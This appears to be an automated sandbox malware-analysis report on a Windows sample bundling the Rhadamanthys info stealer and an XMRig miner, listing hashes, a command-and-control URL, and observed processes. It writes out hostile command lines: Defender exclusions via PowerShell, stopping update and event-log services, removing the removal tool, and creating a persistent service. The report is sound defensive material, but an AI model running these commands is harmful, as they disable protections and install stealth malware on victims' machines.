Analysis
-
max time kernel
153s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-12-2024 21:18
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe
-
Size
784.9MB
-
MD5
e8458ffdeb74037013babec723bed5b9
-
SHA1
6f286cf8019d12e44e5316ff9c977b316aa45e38
-
SHA256
ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270
-
SHA512
393bf123ec916aa0e0bb673b8a4ce94553aa8ba0faab1dad566c68a06201702cb645a3c80554a773f3e76075363426e87cd87fe6acf32ab9c725485d89aa2cad
-
SSDEEP
98304:U+eRiRmEKSe9MrFMXHoO0it7mkvoO0F8obO:JeMeS0ZIdooOAA
Malware Config
Extracted
rhadamanthys
https://195.74.86.133:8754/c0ce23b5aec743c595fe43/d5nfjwa5.wtd5k
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2440 created 2992 2440 AppLaunch.exe 49 -
Xmrig family
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral2/memory/4092-106-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4092-109-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4092-108-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4092-107-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4092-105-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4092-98-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4092-97-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4092-110-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4092-111-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1348 powershell.exe 4748 powershell.exe -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 1716 Update.exe 4000 Game.exe 3300 fgsqksxvzdtu.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe Update.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4000 set thread context of 2440 4000 Game.exe 145 -
resource yara_rule behavioral2/memory/4092-106-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-109-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-108-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-107-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-105-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-98-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-97-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-95-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-96-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-110-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4092-111-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1752 sc.exe 2440 sc.exe 2868 sc.exe 2672 sc.exe 4212 sc.exe 1144 sc.exe 4608 sc.exe 1556 sc.exe 2088 sc.exe 1948 sc.exe 512 sc.exe 3820 sc.exe 5080 sc.exe 1976 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Game.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dialer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1716 Update.exe 1716 Update.exe 1716 Update.exe 1348 powershell.exe 1348 powershell.exe 1716 Update.exe 1716 Update.exe 1716 Update.exe 1716 Update.exe 1716 Update.exe 1716 Update.exe 1716 Update.exe 1716 Update.exe 1716 Update.exe 1716 Update.exe 1716 Update.exe 4748 powershell.exe 4748 powershell.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe 4092 conhost.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1348 powershell.exe Token: SeDebugPrivilege 4748 powershell.exe Token: SeLockMemoryPrivilege 4092 conhost.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2152 wrote to memory of 1716 2152 JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe 84 PID 2152 wrote to memory of 1716 2152 JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe 84 PID 2152 wrote to memory of 4000 2152 JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe 85 PID 2152 wrote to memory of 4000 2152 JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe 85 PID 2152 wrote to memory of 4000 2152 JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe 85 PID 4220 wrote to memory of 208 4220 cmd.exe 108 PID 4220 wrote to memory of 208 4220 cmd.exe 108 PID 3728 wrote to memory of 3612 3728 cmd.exe 128 PID 3728 wrote to memory of 3612 3728 cmd.exe 128 PID 3392 wrote to memory of 3236 3392 cmd.exe 135 PID 3392 wrote to memory of 3236 3392 cmd.exe 135 PID 4000 wrote to memory of 2440 4000 Game.exe 145 PID 4000 wrote to memory of 2440 4000 Game.exe 145 PID 4000 wrote to memory of 2440 4000 Game.exe 145 PID 4000 wrote to memory of 2440 4000 Game.exe 145 PID 4000 wrote to memory of 2440 4000 Game.exe 145 PID 4000 wrote to memory of 2440 4000 Game.exe 145 PID 4000 wrote to memory of 2440 4000 Game.exe 145 PID 4000 wrote to memory of 2440 4000 Game.exe 145 PID 2440 wrote to memory of 1300 2440 AppLaunch.exe 146 PID 2440 wrote to memory of 1300 2440 AppLaunch.exe 146 PID 2440 wrote to memory of 1300 2440 AppLaunch.exe 146 PID 2440 wrote to memory of 1300 2440 AppLaunch.exe 146 PID 2440 wrote to memory of 1300 2440 AppLaunch.exe 146
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2992
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1300
-
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ea73ef397ac6fb9c0bef8b7df8f8d952e4de3cb0dc207c411564de53e5fed270.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1716 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:208
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:512
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4608
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2440
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:3820
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2868
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AMGADKZM"3⤵
- Launches sc.exe
PID:1556
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AMGADKZM" binpath= "C:\ProgramData\ugmhtsgjtwds\fgsqksxvzdtu.exe" start= "auto"3⤵
- Launches sc.exe
PID:1752
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "AMGADKZM"3⤵
- Launches sc.exe
PID:2672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Update.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3612
-
-
-
-
C:\Users\Admin\AppData\Roaming\Game.exeC:\Users\Admin\AppData\Roaming\Game.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2440
-
-
-
C:\ProgramData\ugmhtsgjtwds\fgsqksxvzdtu.exeC:\ProgramData\ugmhtsgjtwds\fgsqksxvzdtu.exe1⤵
- Executes dropped EXE
PID:3300 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3236
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1948
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4212
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1144
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5080
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2776
-
-
C:\Windows\system32\conhost.execonhost.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.7MB
MD5fb3b1908eddb8e4eafa9437510dea273
SHA17aeca2c69a92bfdbf3b791704f23c0a6ad4c679c
SHA2561a6641fef7fcebea9b81d84ed109249217a8b91c7a991791b3611461fd4059a1
SHA5128f8bcbec4f2c7919b54da88557655177a259d31dcdc1c1d14a3fe4b4f947744a9f127496e120fff8375d6b4d684099f4448a03d30cdc9c38d2bfe9da5e2971be